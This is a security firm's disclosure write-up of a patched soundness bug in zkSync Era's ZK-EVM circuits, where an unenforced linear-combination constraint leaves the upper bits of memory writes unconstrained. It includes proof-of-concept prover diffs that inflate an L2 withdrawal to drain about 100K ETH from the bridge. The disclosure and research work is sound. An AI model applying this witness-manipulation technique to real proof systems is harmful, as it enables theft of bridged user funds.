Patch Thursday — Uncovering a ZK-EVM Soundness Bug in zkSync Era

ChainLight
ChainLight Blog & Research
Nov 2, 2023 · 15 min read

ChainLight researchers identified a soundness bug in the ZK-circuits for the zkSync Era mainnet on September 15th and promptly reported the issue on the 19th. The bug allowed a malicious prover to produce “proofs” for invalidly executed blocks, which the verifier smart contracts on L1 would have accepted. Matter Labs has deployed a fix for the issue and awarded ChainLight a 50K USDC reward for disclosing the issue, the first bounty to be claimed for a ZK-circuit bug in zkSync Era.

This post will detail how we discovered the issue and explain how our proof-of-concept exploit works.

Background

To help readers understand the nature of this bug, we provide the following background information:

  • Validity Proofs
  • ZK-Rollups and Validiums
  • ZK-EVMs
  • zkSync Era

Validity Proofs

Validity proofs refer to a broad class of cryptographic tools which enable verifiable computation. By verifiable computation, we mean that one party (the prover) can perform some expensive computation, such as executing a bunch of transactions on a blockchain, and produce a proof that the computation was done correctly. This proof must be relatively small (compared to the amount of computation it proves) and must be computationally cheap to verify.

In practice today, most validity proof systems use ZK-STARKs or ZK-SNARKs, so validity proofs are sometimes called “ZK-proofs.” In these systems, the correctness of the computation is enforced by constraints derived from a “ZK-circuit,” which describes the computation. It is critical that these circuits correctly constrain the inputs and outputs according to the computation rules, or else a malicious prover could produce “proofs” for invalid computation, known as a soundness error.
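As a toy illustration of a soundness error (our own example, not drawn from any real proof system), imagine a circuit meant to prove that c = a * b. If the multiplication constraint is simply never added, a prover can claim any c and verification still passes:

// Toy illustration only: a "circuit" here is just a list of equality
// constraints between witness values, checked naively.
fn satisfied(constraints: &[(u64, u64)]) -> bool {
    constraints.iter().all(|&(lhs, rhs)| lhs == rhs)
}

fn main() {
    let (a, b) = (3u64, 5u64);
    let claimed_c = 9999u64; // clearly not a * b

    // Sound circuit: the product constraint is present, so the bogus claim is rejected.
    let sound = vec![(claimed_c, a * b)];
    assert!(!satisfied(&sound));

    // Unsound circuit: the constraint was never added, so any claimed_c "verifies".
    let unsound: Vec<(u64, u64)> = vec![];
    assert!(satisfied(&unsound)); // soundness error: an invalid claim is accepted
}

Real proof systems are vastly more sophisticated, but as we will see, the bug in this post boils down to exactly this pattern: a constraint that was intended but never actually emitted.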

ZK-Rollups and Validiums

Verifiable computation is a fundamental tool for scaling blockchain applications. Typically, any computation performed on a blockchain is repeated by each node in the network. This model inherently leads to a trade-off between decentralization and scalability because mass decentralization can only be achieved if the hardware requirements to run a node are reasonably low. Verifiable computation solves this issue by introducing asymmetric requirements: only one party performs the expensive computation, but all other participants can cheaply verify the correctness.

While validity proofs may one day be used to scale blockchains such as Ethereum directly, they are currently primarily used to create second-layer (L2) blockchains that settle to an existing (L1) blockchain.

L2 blockchains using validity proofs perform the following two roles using smart contracts:

  • Store their state roots on the L1 blockchain.
  • Verify the validity proof corresponding to each state root, ensuring the blocks were executed correctly.

Without delving extensively into the terminology debate, L2s using ZK-based validity proofs are called either “ZK-rollups” or “Validiums.”

ZK-EVMs

In general, ZK-EVM refers to any execution environment modeled “closely” after the EVM which can be validity proven. Various types of ZK-EVMs exist with different similarities to the Ethereum standard. The gold standard is a type-1 ZK-EVM, which could be used to natively scale the Ethereum base layer, but many ZK-EVMs make adjustments in order to increase proving efficiency.

ZK-rollups or Validiums that settle to Ethereum are not required to be based on ZK-EVMs, but the amount of EVM-based tooling and developers makes it an attractive option.

zkSync Era

zkSync Era is a ZK-powered scaling solution for Ethereum and is currently the most used L2, with a transaction volume rivaling Ethereum itself. This makes it one of the most critical pieces of infrastructure in the crypto space. zkSync Era was created by the team at Matter Labs, one of the core contributors to the protocol, who have stated since inception that security is “the most critical aspect of launching zkSync Era to the public,” a stance backed by their multi-layered security approach. While using multiple security layers is common practice amongst L2s, the community sometimes calls them “training wheels” because they are seen as a temporary measure needed only in these early stages. In fact, for most of these L2s to meet their decentralization goals, some of these layers must be removed or significantly adapted. For instance, all governance roles currently controlled by an internal multi-sig must (at minimum) be placed behind an appropriately long timelock that lets users exit before an action takes effect.

As the training wheels get removed, the correctness of the validity proof scheme becomes paramount. Below, we’ll give an overview of how this system works. For further details, we suggest checking out the Code4rena zkSync Era audit docs.

EraVM

zkSync Era’s execution environment is a type-4 ZK-EVM, which supports the same high-level languages as the EVM, such as Solidity, Yul, and Vyper, but compiles to a custom instruction set. The EraVM is somewhat similar to the EVM but has some significant differences. To name a few:

  • The EraVM is register-based, while the EVM is stack-based. In some cases, the EraVM still uses a stack as temporary storage, like when it runs out of registers, but most opcodes will take register operands.
  • The EraVM has two heaps (the heap and the aux heap), which can be used for temporary memory and to pass data between contracts. To emulate the EVM’s calldata and returndata semantics, the EraVM explicitly tracks whether each 256-bit value is a pointer into another heap, called a “fat pointer”, and enforces rules for how fat pointers can be passed between contracts (a conceptual sketch follows this list).
  • Inter-contract calls do not have a value. Thus, they can not transfer ETH directly.
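For intuition, a fat pointer can be pictured roughly as follows. This is a conceptual sketch based on the public EraVM documentation; the field names are illustrative and this is not the in-circuit representation.

// Conceptual sketch only, not actual EraVM definitions.
struct FatPointer {
    memory_page: u32, // which heap (page) the pointer refers to
    start: u32,       // start of the slice the callee is allowed to read
    length: u32,      // length of that slice
    offset: u32,      // current position within the slice
}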

In order to more closely match the EVM semantics, the EraVM uses a set of “system contracts” that run in “kernel mode” and have permission to execute privileged instructions. For example, since calls cannot natively transfer ETH, ETH balance tracking and transferring are instead handled by a system contract called L2EthToken. To perform a call that also transfers ETH, you instead call the MsgValueSimulator system contract, which uses its kernel privileges to perform the ETH transfer and then execute a “mimic” call, giving the callee the appearance that it was called directly.

The zkSync Era software stack uses multiple implementations of the EraVM:

  • The zk_evm repo: an out-of-circuit implementation used by the sequencer and any other nodes. The prover also uses this implementation to create a detailed execution trace, which is used as “witness” data for the circuits.
  • The sync_vm repo: a ZK-circuit implementation, which produces the actual constraints that get proven and verified on Ethereum.

EraVM ZK-Circuits

The EraVM circuits are quite complex but are the core technology behind the entire network. Due to the complexity, we will only touch on a few parts of the circuits that are relevant to the identified soundness issue; for more details, check out these docs.

Since any ZK-circuit produces a fixed number of constraints, proving arbitrary amounts of computation requires recursive circuits that verify proofs of other circuits. Additionally, the responsibilities are divided between many circuits, constraining different parts of the computation. Ultimately, all of the proofs get aggregated into a single proof, verified by a smart contract on Ethereum.

Figure: zkSync EraVM Circuit Architecture (Source)

For our purposes, we’ll focus on these two circuits:

  1. Main VM: Constrains the sequence of instructions executed and the inputs and outputs of basic instructions such as arithmetic, and produces a queue of partially constrained results to be further constrained by other circuits.
  2. RAM Permutation: Validates that the “memory queue” (list of memory operations) produced by the Main VM circuit (and other circuits that access memory) is self-consistent.

Memory Queue

As the two circuits highlighted above suggest, the issue relates to memory operations, so it is worth first spending more time on how memory reads and writes get constrained.

Since memory can be written by operations handled in other circuits, such as code decommitment and Keccak hashing, the Main VM circuit cannot constrain memory reads on its own. Instead, any time it reads a value from memory or writes a value to memory, it appends the operation to the memory queue.

The memory queue commits to a sequence of MemoryQuery objects, which specify 4 things:

  1. when the access occurred (relative to other instructions)
  2. which memory was accessed
  3. whether it was read or written
  4. what value was read or written
pub struct MemoryQuery<E: Engine> {
    pub timestamp: UInt32<E>,
    pub memory_page: UInt32<E>,
    pub memory_index: UInt32<E>,
    pub rw_flag: Boolean,
    pub value: UInt256<E>,
    pub value_is_ptr: Boolean,
}

Using the queue, the Main VM circuit can handle “store” (memory write) instructions by constraining that the source register value is placed into a “write” MemoryQuery (with the destination memory location) and appended to the queue. Handling reads is more complicated because the Main VM circuit cannot know on its own what value should exist at a given address (because other circuits can edit memory). Therefore, in order to handle reads, the circuit can load a witness value into the register and append a “read” MemoryQuery to the queue with the claimed value.
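To make this concrete, here is a rough sketch of how a store and a load each append a MemoryQuery. This is written in the spirit of the circuit code but is not the sync_vm API: the real circuit works over constrained field elements, commits to the queue with a running hash rather than a Vec, and also tracks value_is_ptr.

// Rough sketch only, not the actual sync_vm queue.
struct MemoryQuery {
    timestamp: u32,
    memory_page: u32,
    memory_index: u32,
    rw_flag: bool, // true = write, false = read
    value: [u64; 4],
}

struct MemoryQueue {
    queries: Vec<MemoryQuery>,
}

impl MemoryQueue {
    // A store: the written value is fully determined by the source register.
    fn push_write(&mut self, ts: u32, page: u32, index: u32, value: [u64; 4]) {
        self.queries.push(MemoryQuery {
            timestamp: ts,
            memory_page: page,
            memory_index: index,
            rw_flag: true,
            value,
        });
    }

    // A load: the circuit accepts a prover-supplied witness value here and
    // relies on the RAM Permutation circuit to later check that it is
    // consistent with writes to the same (page, index).
    fn push_read(&mut self, ts: u32, page: u32, index: u32, witness_value: [u64; 4]) -> [u64; 4] {
        self.queries.push(MemoryQuery {
            timestamp: ts,
            memory_page: page,
            memory_index: index,
            rw_flag: false,
            value: witness_value,
        });
        witness_value
    }
}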

After all memory operations are committed to by the various circuits, the RAM Permutation circuit checks their consistency. This circuit takes two memory queues as input:

  1. The committed queue from the Main VM circuits (and other memory-accessing circuits).
  2. A witness “sorted” queue, which is constrained to contain the same multiset of MemoryQuery objects but sorted by (memory_page, memory_index, timestamp).

By sorting the accesses this way, the RAM Permutation circuit can check memory consistency by iterating the queue once and comparing adjacent elements.

In pseudocode:

if (prev.memory_page, prev.memory_index) == (cur.memory_page, cur.memory_index) {
    // if cur accesses the same location as the previous, it must either be a write
    // OR have the same value as the previous access
    assert!(cur.rw_flag || cur.value == prev.value);
} else {
    // if cur accesses a new location, it must either be a write OR read the zero value
    assert!(cur.rw_flag || cur.value == 0);
}

Of course, the actual code producing these constraints is nontrivial. For example, checking that the committed and sorted queues contain the same elements is done using a permutation argument, a common trick used in ZK-proofs.
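As a rough sketch of the idea (not the actual sync_vm constraints), a grand-product permutation argument reduces multiset equality to comparing two products evaluated at a random challenge sampled after both queues are committed:

// Sketch only: two lists contain the same multiset of (encoded) elements iff
//     prod_i (a_i + gamma) == prod_i (b_i + gamma)
// holds, except with negligible probability, for a random challenge gamma.
// A small 64-bit prime field is used here purely for illustration.
const P: u128 = 0xffff_ffff_0000_0001; // the Goldilocks prime

fn grand_product(elements: &[u128], gamma: u128) -> u128 {
    elements
        .iter()
        .fold(1u128, |acc, &e| acc * ((e % P + gamma % P) % P) % P)
}

fn same_multiset(committed: &[u128], sorted: &[u128], gamma: u128) -> bool {
    grand_product(committed, gamma) == grand_product(sorted, gamma)
}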

Bug Details

We’ve now covered enough background to get into the bug. As is often the case, the devil is in the implementation details.

The first important implementation detail is that the above MemoryQuery struct is actually a slightly simplified version of what the queue contains. These MemoryQuery structs get converted into RawMemoryQuery form:

pub struct RawMemoryQuery<E: Engine> {
    pub timestamp: UInt32<E>,
    pub memory_page: UInt32<E>,
    pub memory_index: UInt32<E>,
    pub rw_flag: Boolean,
    pub value_residual: UInt64<E>,
    pub value: Num<E>,
    pub value_is_ptr: Boolean,
}

Notice the difference: the value field used to be a UInt256<E>, but it has now been split into two fields with types Num<E> and UInt64<E>. This conversion is needed because the curve used in the circuits (bn254) can only reliably store 253 bits in a single field element. In fact, the UInt256<E> type internally stores the value as 4 UInt64<E> values, each in their own Num<E>. In a RawMemoryQuery, the value field stores the lower 192 bits of the value, while the value_residual field stores the upper 64 bits. For efficiency reasons, the RawMemoryQuery ultimately gets encoded as 2 Num<E> values before being appended to the queue:

impl<E: Engine> RawMemoryQuery<E> {
    pub fn pack<CS: ConstraintSystem<E>>(
        &self,
        cs: &mut CS,
    ) -> Result<[Num<E>; 2], SynthesisError> {
        let shifts = compute_shifts::<E::Fr>();
        let el0 = self.value;
        let mut shift = 0;
        let mut lc = LinearCombination::zero();

        lc.add_assign_number_with_coeff(&self.value_residual.inner, shifts[shift]);
        shift += 64;

        // NOTE: we pack is as it would be compatible with PackedMemoryQuery later on
        lc.add_assign_number_with_coeff(&self.memory_index.inner, shifts[shift]);
        shift += 32;
        lc.add_assign_number_with_coeff(&self.memory_page.inner, shifts[shift]);
        shift += 32;

        // ------------
        lc.add_assign_number_with_coeff(&self.timestamp.inner, shifts[shift]);
        shift += 32;
        lc.add_assign_boolean_with_coeff(&self.rw_flag, shifts[shift]);
        shift += 1;
        lc.add_assign_boolean_with_coeff(&self.value_is_ptr, shifts[shift]);
        shift += 1;

        assert!(shift <= E::Fr::CAPACITY as usize);

        let el1 = lc.into_num(cs)?;
        // dbg!(el0.get_value());
        // dbg!(el1.get_value());

        Ok([el0, el1])
    }
}

Here is how to understand what is happening in the above code:

  • cs references the ConstraintSystem, which is passed around through the entire circuit code to accumulate constraints. Generally speaking, a function is expected to produce constraints if and only if it takes cs as an argument.
  • pack returns [el0, el1], where el0 is taken from self.value, and el1 is constructed by packing the remaining elements into a single Num<E> (explained below).
  • compute_shifts::<E::Fr>() simply computes all values of (1 << i) for 0 <= i <= 253 as constant field elements. This is just a convenience function that doesn’t produce any circuit constraints on its own.
  • el1 is constructed by using a LinearCombination, which computes expressions of the form a_0 v_0 + a_1 v_1 + … + a_n v_n where a_i are constant field elements and the v_i are circuit variables. The shifts are used to pack the RawMemoryQuery fields into non-overlapping regions of the 253-bit value. The result of the linear combination is stored in a new variable by calling lc.into_num(cs).
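Concretely, reading the shifts off the code above, the two-element encoding lays out as follows. The constant names below are ours, added purely for illustration:

// el0 = value (the low 192 bits of the 256-bit value).
// el1 packs the remaining fields into non-overlapping bit ranges:
const VALUE_RESIDUAL_SHIFT: usize = 0;  // 64 bits: the high 64 bits of the value
const MEMORY_INDEX_SHIFT: usize = 64;   // 32 bits
const MEMORY_PAGE_SHIFT: usize = 96;    // 32 bits
const TIMESTAMP_SHIFT: usize = 128;     // 32 bits
const RW_FLAG_SHIFT: usize = 160;       // 1 bit
const VALUE_IS_PTR_SHIFT: usize = 161;  // 1 bit
// 162 bits in total, comfortably under the ~253-bit capacity asserted in pack().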

The above code to pack the RawMemoryQuery into two field elements looks sound, so let us now look at how the RawMemoryQuery was first constructed. When handling a memory write instruction, it constructs a MemoryWriteQuery and converts it to a RawMemoryQuery:

let MemoryLocation { page, index } = mem_loc;

let memory_key = MemoryKey {
    timestamp: mem_timestamp_write,
    memory_page: page,
    memory_index: index,
};

let write_query = MemoryWriteQuery::from_key_and_value_witness(cs, memory_key, value)?;

...

let raw_query = write_query.into_raw_query(cs)?;

...

So, how does the MemoryWriteQuery work? In the above code, value is a Register<E>, which stores a 256-bit value as two UInt128<E>s:

pub struct Register<E: Engine> {
    pub inner: [UInt128<E>; 2],
    pub is_ptr: Boolean,
}

When constructing the MemoryWriteQuery, this register value gets further split into 3 values (lowest_128, u64_word_2, u64_word_3); another LinearCombination is meant to tie the two newly allocated 64-bit words back to highest_128:

pub(crate) fn from_key_and_value_witness<CS: ConstraintSystem<E>>(
    cs: &mut CS,
    key: MemoryKey<E>,
    register_output: Register<E>,
) -> Result<Self, SynthesisError> {
    let [lowest_128, highest_128] = register_output.inner;

    let tmp = highest_128
        .get_value()
        .map(|el| (el as u64, (el >> 64) as u64));

    let (u64_word_2, u64_word_3) = match tmp {
        Some((a, b)) => (Some(a), Some(b)),
        _ => (None, None),
    };

    let u64_word_2 = UInt64::allocate_unchecked(cs, u64_word_2)?;
    let u64_word_3 = UInt64::allocate(cs, u64_word_3)?;
    let shifts = compute_shifts::<E::Fr>();
    let mut minus_one = E::Fr::one();

    minus_one.negate();

    let mut lc = LinearCombination::zero();

    lc.add_assign_number_with_coeff(&u64_word_2.inner, shifts[0]);
    lc.add_assign_number_with_coeff(&u64_word_3.inner, shifts[64]);
    lc.add_assign_number_with_coeff(&highest_128.inner, minus_one);

    let MemoryKey {
        timestamp,
        memory_page,
        memory_index,
    } = key;

    let new = Self {
        timestamp,
        memory_page,
        memory_index,
        lowest_128,
        u64_word_2,
        u64_word_3,
        value_is_ptr: register_output.is_ptr,
    };
    Ok(new)
}

MemoryWriteQuery::into_raw_query goes on to store u64_word_3 into value_residual, while packing lowest_128 and u64_word_2 into the value field:

pub(crate) fn into_raw_query<CS: ConstraintSystem<E>>(
    &self,
    cs: &mut CS,
) -> Result<RawMemoryQuery<E>, SynthesisError> {
    let shifts = compute_shifts::<E::Fr>();
    let mut lc = LinearCombination::zero();

    lc.add_assign_number_with_coeff(&self.lowest_128.inner, shifts[0]);
    lc.add_assign_number_with_coeff(&self.u64_word_2.inner, shifts[128]);

    let value = lc.into_num(cs)?;

    let new = RawMemoryQuery {
        timestamp: self.timestamp,
        memory_page: self.memory_page,
        memory_index: self.memory_index,
        rw_flag: Boolean::constant(true),
        value_residual: self.u64_word_3,
        value,
        value_is_ptr: self.value_is_ptr,
    };

    Ok(new)
}

So, where is the bug? It is subtle, but recall the rule-of-thumb that constraints only get produced by functions that take a cs parameter. Looking again at the from_key_and_value_witness code:

let mut lc = LinearCombination::zero();

lc.add_assign_number_with_coeff(&u64_word_2.inner, shifts[0]);
lc.add_assign_number_with_coeff(&u64_word_3.inner, shifts[64]);
lc.add_assign_number_with_coeff(&highest_128.inner, minus_one);

Unlike the other code using LinearCombinations, this code never actually produces any constraints from lc. Based on the coefficients, it seems the intention is to constrain the lc value to be zero, but to produce these constraints, you must either:

  • call lc.enforce_zero(cs), or
  • call lc.into_num(cs) and further constrain the resulting value

As a result, the upper 128 bits in the resulting MemoryWriteQuery are unconstrained. This means a malicious prover could place any value in these bits, and the verifier would accept the proof as valid. In a correctly constrained circuit, the bits would be constrained to be exactly equal to the bits from the Register<E>.
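For reference, here is a minimal sketch of what a fix could look like, written in the style of the snippet above and assuming the LinearCombination API described earlier; the actual patch shipped by Matter Labs may differ.

let mut lc = LinearCombination::zero();

lc.add_assign_number_with_coeff(&u64_word_2.inner, shifts[0]);
lc.add_assign_number_with_coeff(&u64_word_3.inner, shifts[64]);
lc.add_assign_number_with_coeff(&highest_128.inner, minus_one);

// Actually emit the constraint u64_word_2 + 2^64 * u64_word_3 - highest_128 == 0,
// tying the two freshly allocated words to the upper 128 bits of the register.
lc.enforce_zero(cs)?;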

Discovery Process

ChainLight is mostly known as an auditing firm, but we have also developed a ZK-powered protocol for trustless access to historical Ethereum state called Relic Protocol. Our ZK-circuits are based on Matter Labs’ circuit libraries, in which we had previously encountered this LinearCombination footgun. When we began our review of the zkSync Era circuits, this was the first bug pattern we looked for.

Exploit Details

The bug allows a prover to arbitrarily change the high 128 bits of any value stored in memory (by a store instruction) without changing the validity of the proof. While this could be abused in countless ways, one particularly easy target lies in the L2EthToken system contract.

The code to initiate an ETH withdrawal from zkSync Era back to mainnet is as follows:

/// @notice Initiate the ETH withdrawal, funds will be available to claim on L1 `finalizeEthWithdrawal` method.
/// @param _l1Receiver The address on L1 to receive the funds.
function withdraw(address _l1Receiver) external payable override {
    uint256 amount = _burnMsgValue();

    // Send the L2 log, a user could use it as proof of the withdrawal
    bytes memory message = _getL1WithdrawMessage(_l1Receiver, amount);
    L1_MESSENGER_CONTRACT.sendToL1(message);

    emit Withdrawal(msg.sender, _l1Receiver, amount);
}

/// @dev Get the message to be sent to L1 to initiate a withdrawal.
function _getL1WithdrawMessage(address _to, uint256 _amount) internal pure returns (bytes memory) {
    return abi.encodePacked(IMailbox.finalizeEthWithdrawal.selector, _to, _amount);
}

This method will burn the ETH passed in msg.value before sending an L2->L1 message certifying the withdrawal. Our goal is to burn a small amount of ETH on L2 but create a withdrawal message with a much larger _amount field. Notice that the _getL1WithdrawMessage helper function encodes the withdrawal message into a memory bytes array. This function gets compiled to the following EraVM assembly code:

...

add @CPI0_20[0], r0, r2 // load the function selector into `r2`
ld.1 64, r1 // load the current free memory pointer into `r1`
add 32, r1, r3
st.1 r3, r2 // store function selector into memory at `r1+32`
shl.s 96, r4, r2
add 36, r1, r3
st.1 r3, r2 // store `_to` parameter into memory at `r1+36`
add 56, r1, r2
st.1 r2, r5 // store `_amount` parameter into memory at `r1+56`
add 56, r0, r2
st.1 r1, r2 // store `56` into memory at `r1` (length field)

...
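To keep the offsets straight, here is how the 56-byte packed message maps onto the offsets used in the assembly above. This follows directly from the abi.encodePacked call; the constant names are ours, for illustration only.

// Byte offsets within the packed withdrawal message, relative to the start of
// the bytes array data (r1 + 32 in the assembly above).
const SELECTOR_OFFSET: usize = 0;  // 4-byte finalizeEthWithdrawal selector
const TO_OFFSET: usize = 4;        // 20-byte _l1Receiver address
const AMOUNT_OFFSET: usize = 24;   // 32-byte big-endian _amount (absolute offset r1 + 56)
const MESSAGE_LEN: usize = 56;     // matches the length field stored at r1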

Each of the st.1 instructions stores a register’s value into the heap at the given offset. These instructions allow misaligned stores (to addresses that are not multiples of 32), which the EraVM translates into two aligned MemoryWriteQuery objects. Hence, when storing the _amount parameter, two aligned write queries get created:

{
    memory_page: CUR_HEAP_PAGE,
    memory_index: (r1 + 56) // 32,
    value: (uint256(_to) << 64) | (_amount >> 192)
},
{
    memory_page: CUR_HEAP_PAGE,
    memory_index: (r1 + 56) // 32 + 1,
    value: (_amount << 64)
}
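The byte-level splitting can be sketched as follows. This is illustrative only, not the actual EraVM UMA code, and it assumes r1 itself is 32-byte aligned (so the unalignment is 56 % 32 = 24 bytes); it shows why the second query’s value ends up being _amount shifted left by 64 bits.

// Illustrative sketch of splitting the misaligned 32-byte store of `_amount`
// at r1+56 across two aligned, big-endian heap words.
fn split_amount_store(word0: &mut [u8; 32], word1: &mut [u8; 32], amount_be: [u8; 32]) {
    let unalignment = 24;
    // The 8 most significant bytes of `_amount` land at the end of the first word ...
    word0[unalignment..].copy_from_slice(&amount_be[..32 - unalignment]);
    // ... and the remaining 24 bytes land at the start of the second word, which
    // therefore holds (_amount << 64) when read back as a 256-bit value.
    word1[..unalignment].copy_from_slice(&amount_be[32 - unalignment..]);
}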

Exploit Code

Our goal is to change the value of the second write query above to increase the amount of ether attested by the withdraw message. For this, we edit the code responsible for handling write queries in each EraVM implementation. Each edit will implement the following logic:

  • Check if the _amount value being written matches some magic value, such as 0x133713371337 wei (~0.00002 ETH).
  • If so, change the high 128 bits (of the misaligned write) so that _amount becomes a huge value, such as 0x152d0000133713371337 wei (~100K ETH). A quick sanity check of these conversions follows below.
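The wei-to-ETH conversions above are plain arithmetic, nothing zkSync-specific:

fn main() {
    const WEI_PER_ETH: f64 = 1e18;
    // The magic amount actually burned on L2 (the trigger value) ...
    let burned: u128 = 0x1337_1337_1337;
    // ... and the inflated amount attested in the L2 -> L1 withdrawal message.
    let attested: u128 = 0x152d_0000_1337_1337_1337;
    println!("burned   = {:.6} ETH", burned as f64 / WEI_PER_ETH);   // ~0.000021 ETH
    println!("attested = {:.0} ETH", attested as f64 / WEI_PER_ETH); // ~100,000 ETH
}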

zk_evm repo diff:

diff --git a/src/opcodes/execution/uma.rs b/src/opcodes/execution/uma.rs
index 276c02b..7d2f0d5 100644

--- a/src/opcodes/execution/uma.rs
+++ b/src/opcodes/execution/uma.rs
@@ -371,6 +371,14 @@ impl<const N: usize, E: VmEncodingMode<N>> DecodedOpcode<N, E> {
(word_0_read_value >> (word_0_lowest_bytes * 8)) << (word_0_lowest_bytes * 8);
// add highest bytes into lowest for overwriting
new_word_0_value = new_word_0_value | (src1 >> (unalignment * 8));
+
+ // see if we're writing 0x1337133713370000000000000000
+ if new_word_0_value.0[1] == 0x133713371337 {
+ // if so, instead write 0x152d00001337133713370000000000000000
+ new_word_0_value.0[2] = 0x152d;
+ }
+
// we need low bytes of old word and place low bytes of src1 into highest
// cleanup highest bytes
let mut new_word_1_value =

sync_vm repo diff:

diff --git a/src/vm/vm_cycle/memory_view/write_query.rs b/src/vm/vm_cycle/memory_view/write_query.rs
index cbb4172..0b09ecd 100644

--- a/src/vm/vm_cycle/memory_view/write_query.rs
+++ b/src/vm/vm_cycle/memory_view/write_query.rs
@@ -60,6 +60,11 @@ impl<E: Engine> MemoryWriteQuery<E> {
_ => (None, None),
};
+ let u64_word_2 = if let Some(0x1337133713370000000000000000_u128) = lowest_128.get_value() {
+ Some(0x152d)
+ } else {
+ u64_word_2
+ };
// we do not need to range check everything, only N-1 ut of N elements in LC
let u64_word_2 = UInt64::allocate_unchecked(cs, u64_word_2)?;

It is important to note that this change only modifies the witness value assigned to the variable and thus doesn’t change the constraints produced by the circuit.

Executing the Exploit

With these code changes in the backend, a sequencer/prover can now process a withdrawal with the magic value of 0x133713371337 wei (~0.00002 ETH) and output a proven batch, which attests that the recipient withdrew 0x152d0000133713371337 wei (~100K ETH). The zkSync Era smart contracts will accept this proof, after which the attacker can drain 100K ETH from the bridge.

If you’re interested in more details, check out our PoC code.

Impact

Given the security layers in place today, it would be difficult for anybody except Matter Labs to pull off the exploit above. An attack scenario (for an outside actor) would look as follows:

  1. Compromise the zkSync Era backend to inject the malicious code or steal the zkSync Era validator private key.
  2. Execute the exploit described above.
  3. Wait out the 21-hour execution delay, and hope the team does not freeze the protocol before the stolen funds can be withdrawn.

As you can see, the execution delay makes practical exploitation of this issue quite difficult today. However, the chances of pulling off such an attack increase significantly in a more decentralized future where an admin team less directly manages the protocol.

Hence, securing the ZK-circuits powering L2s is a crucial part of the long-term scaling roadmap for Ethereum. We commend the zkSync Era team for offering rewards for ZK-circuit bugs and hope that more security researchers will review these critical ZK-circuits going forward.

About ChainLight

Patch Thursday is ChainLight’s weekly report introducing and analyzing vulnerabilities discovered and reported by our award-winning security researchers. With the mission to assist security researchers and developers in collectively learning, growing, and contributing to making Web3 a safer place, we release our report every week, free of charge.

To receive the latest research and reports conducted by award-winning experts:

👉 Subscribe to our newsletter

👉 Follow @ChainLight_io

Established in 2016, ChainLight’s award-winning experts provide tailored security solutions to fortify your smart contract and help you thrive on the blockchain.
